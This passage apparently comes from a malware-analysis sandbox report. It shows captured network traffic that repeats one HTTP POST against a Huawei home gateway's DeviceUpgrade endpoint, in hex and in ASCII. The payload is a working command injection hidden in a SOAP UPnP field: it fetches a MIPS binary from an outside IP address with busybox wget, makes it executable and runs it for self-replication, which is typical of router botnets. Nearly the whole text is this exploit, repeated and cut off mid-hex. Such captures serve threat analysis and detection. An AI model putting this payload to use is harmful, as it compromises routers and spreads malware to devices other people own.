74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 